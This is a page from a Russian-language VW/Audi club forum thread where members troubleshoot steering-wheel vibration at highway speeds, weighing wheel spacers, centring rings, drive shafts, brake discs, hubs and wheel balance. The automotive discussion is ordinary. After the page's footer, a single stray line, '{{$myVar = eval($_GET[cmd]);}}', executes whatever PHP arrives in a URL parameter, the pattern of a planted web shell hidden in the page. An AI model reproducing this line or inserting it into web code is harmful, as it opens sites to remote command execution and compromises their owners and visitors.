+ Ответить в теме
Страница 2 из 3 ПерваяПервая 1 2 3 ПоследняяПоследняя
Показано с 11 по 20 из 22

Тема: ПОМОГИТЕ!!!РУКИ ОПУСКАЮТСЯ!!!!!!!ВИБРАЦИЯ!!!!


  1. #11
    GTI-Racing NAGROM85 is on a distinguished road Аватар для NAGROM85
    Регистрация
    18.09.2010
    Откуда
    Нижневартовск
    Машина
    AUDI 2.7T 300hp
    Сообщений
    129
    Цитата Сообщение от Ronny Посмотреть сообщение
    болты правильные.... на зимних колесах тоже самое. проставочных колец нет. проставка выточена четко под колеса и ступицы. диски тормозные начинали бить после тыщ 5 пробега....
    остается только привода... даже на 16 дисках была легкая вибра...это реально жесть...
    я прокатал диски и отбалансировал,биение стало на 110,а было на 120.и опять же не всегда,через раз.отчетливее чувствуется,когда накатом едешь на этой скорости,под нагрузкой не так ощущается.следующее что,проточу диски тормозные.а ты попробуй привода,что еще остается(

  2. #12
    Модератор inVENTOr is just really nice inVENTOr is just really nice inVENTOr is just really nice inVENTOr is just really nice Аватар для inVENTOr
    Регистрация
    06.03.2006
    Откуда
    CCCР
    Машина
    BMW 330D Соляра Power
    Сообщений
    1,780
    Посмотри задние сайлентблоки передних рычагов:) я поставил от ТТ вибрации нет:)
    Но если пару раз по тормозам жестко дашь, то после перегрева начинают долбить пока не остынут:)
    BMW 330D POWERED by Dizelboost :pepper:

  3. #13
    GTI-Racing NAGROM85 is on a distinguished road Аватар для NAGROM85
    Регистрация
    18.09.2010
    Откуда
    Нижневартовск
    Машина
    AUDI 2.7T 300hp
    Сообщений
    129
    Цитата Сообщение от inVENTOr Посмотреть сообщение
    Посмотри задние сайлентблоки передних рычагов:) я поставил от ТТ вибрации нет:)
    Но если пару раз по тормозам жестко дашь, то после перегрева начинают долбить пока не остынут:)
    врядли то,т.к. прочитал что ты написал,пошел сел в машину,стояла 2 часа,и поехал,на 110 биение,по тормозам не давал.
    а может бить руля из-за дисков тормозных,а при торможении ничего плохого не чувствуется?

  4. #14
    GTI-Racing Ronny is on a distinguished road Аватар для Ronny
    Регистрация
    16.11.2007
    Откуда
    Москва
    Сообщений
    246
    у меня от тт сайлент блоки и стоят как купил)))
    на счет приводов есть фирмы LPR оба привода встанут в 10300 новые в сборе по блату.. грят ниче. и есть SKF оба привода встанут в 18200..тоже новые.... вот и думаю...

    ну ведь задние диски если кривые из-за них же не будет так бить??? или мож сайлент блоки задней балки...

    Добавлено через 7 часов 53 минуты
    ребза не дайте мне выпрыгнуть на мкаде из окна когда опять начнет трясти руль плиа.... давайте все варианты


    еще заметил что при езде на скорости в повороте не сильном или сильном например направо то вибрация в руль передается четче.... и если ехать что в салоне 4 человека то вибрация сильнее и при нажатии тормоз тоже сильнее...а если тормозить в повороте то руль вообще хрен удержать
    Последний раз редактировалось Ronny; 30.05.2012 в 20:41. Причина: Добавлено сообщение

  5. #15
    Модератор inVENTOr is just really nice inVENTOr is just really nice inVENTOr is just really nice inVENTOr is just really nice Аватар для inVENTOr
    Регистрация
    06.03.2006
    Откуда
    CCCР
    Машина
    BMW 330D Соляра Power
    Сообщений
    1,780
    Роня чота дрова какието) ) )
    А ты Не думал что привод от того что занижена машина стоит криво?
    может стоит проставками двигун выставить повыше, чтобы привода ровно стали?
    у меня большого биения нет, но раньше при торможении было, я сайленты заменил и сделал профилактику супортов, все прошло:)
    у тя диски с проставками? у меня такая батва была када я купил японовские колеса зимой, с резиной R17 215-45, вибрация заколебала, стояли проставки и кольца ЦОшные, снял все и продал к чертям, диски были ровные, в чем причина так и не понял:)
    BMW 330D POWERED by Dizelboost :pepper:

  6. #16
    GTI-Racing Ronny is on a distinguished road Аватар для Ronny
    Регистрация
    16.11.2007
    Откуда
    Москва
    Сообщений
    246
    значит так. на 18 дискх у меня проставка 16мм с внутренним выточено 57.1 а внешний под колесный диск 60.1...

    ставил зиму с проставкой нr 15мм 17 зима от ауди с3 фланец 57.1...та же хрень...било на брембах... и при нажатии на тормоз било...

    завтра пока стоит сток тормоза поеду к другу и поставлю его 17 диски и по катаю.. пока диски новые то биения нет при нажатии на тормоз..а вот на скорости есть...и машина не собранная вообще..всегда такой была..

    так же жду еще варианты!!! спасибо.

  7. #17
    GTI-Racing shok5 is on a distinguished road Аватар для shok5
    Регистрация
    09.01.2009
    Машина
    Audi A3 1.8T Quattro BAM DQB
    Сообщений
    111
    Цитата Сообщение от inVENTOr Посмотреть сообщение
    Роня чота дрова какието) ) )
    А ты Не думал что привод от того что занижена машина стоит криво?
    может стоит проставками двигун выставить повыше, чтобы привода ровно стали?
    у меня большого биения нет, но раньше при торможении было, я сайленты заменил и сделал профилактику супортов, все прошло:)
    у тя диски с проставками? у меня такая батва была када я купил японовские колеса зимой, с резиной R17 215-45, вибрация заколебала, стояли проставки и кольца ЦОшные, снял все и продал к чертям, диски были ровные, в чем причина так и не понял:)
    +1. Все было точно также... диски+проставки+центровочные кольца= вибрация как раз в диапазоне 120-140 км/ч....
    месяц так позедил поставил ковку со стандартными параметрами под большие суппорта, без всяких проставок....
    итог: биение больше не наблюдалось проверял до 200 км/ч....

  8. #18
    GTI-Racing Ronny is on a distinguished road Аватар для Ronny
    Регистрация
    16.11.2007
    Откуда
    Москва
    Сообщений
    246
    итак...привода поставил нью оригинал...проблема не ушла..значит один вариант остается... диски тормозные новые едут под 6 рот..оригиналы.

    либо я их сильно грею...или последний вариант это то что ступицу с подшипником запресовывают неправильно..... на подъемнике раскручивал на передаче... самый пик вибрации 140-160 км в час...

    и из=за того что ступица чутка не ровно запресована то диск съедается со временем...или я уже фантастику говорю...или из-за того что на 6 рот впереди стоят то задние колодки почти не снашиваются и идет сильный перегрев переда вот и бить начинает....
    повторюсь ступицы новые и подшипники новые...2 раза так менял..._)))
    какие еще варианты???

  9. #19
    GTI-Racing Grisha is a jewel in the rough Grisha is a jewel in the rough Grisha is a jewel in the rough Аватар для Grisha
    Регистрация
    03.04.2007
    Откуда
    ЗЕЛАО
    Машина
    MKV R32
    Сообщений
    1,576
    Было примерно такое как-то зимой! итог дисбаланс задних дисков из-за тупо налипшей грязи внутри обода, помыо отболансировал и все прошло.
    Так что как видишь бывает дисбаланс именно из-за задних колес. Смотри сами диски с резиной или проставки которые могут быть не совсем правильно сделаны

  10. #20
    III место Лучший Пилот клуба 2011 Гера has a spectacular aura about Гера has a spectacular aura about Гера has a spectacular aura about Аватар для Гера
    Регистрация
    08.11.2007
    Откуда
    в Москве
    Машина
    Nissan Quest
    Сообщений
    4,674
    И чем всё закончилось? Нашёл в чём проблема?
    Golf V GTI МКПП + REVO k04 Stage 3 + Quiafe LSD + intake air system K&N + sway bars H&R + BSR down pipe + APR`s exhaust + сooler autobahn88 + водитель Сергей - продано...

+ Ответить в теме
Страница 2 из 3 ПерваяПервая 1 2 3 ПоследняяПоследняя

Похожие темы

  1. Кривые руки россии!
    от MORG m-customs в разделе Курилка
    Ответов: 3
    Последнее сообщение: 28.11.2023, 14:04
  2. Из рук в руки – продажа авто
    от avtotranskont в разделе Курилка
    Ответов: 0
    Последнее сообщение: 22.12.2013, 20:48
  3. Резонатор APR RSC в добрые руки
    от КИБАЛЬЧИШЬ в разделе Покупка и продажа запчастей
    Ответов: 16
    Последнее сообщение: 12.08.2011, 14:49
  4. Отдам в хорошие руки)))
    от Leo_GTI в разделе Покупка и продажа авто
    Ответов: 6
    Последнее сообщение: 06.11.2007, 02:16
  5. Обороты не опускаются ниже 1000
    от De-lazar в разделе Двигатель
    Ответов: 7
    Последнее сообщение: 11.09.2006, 15:10

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}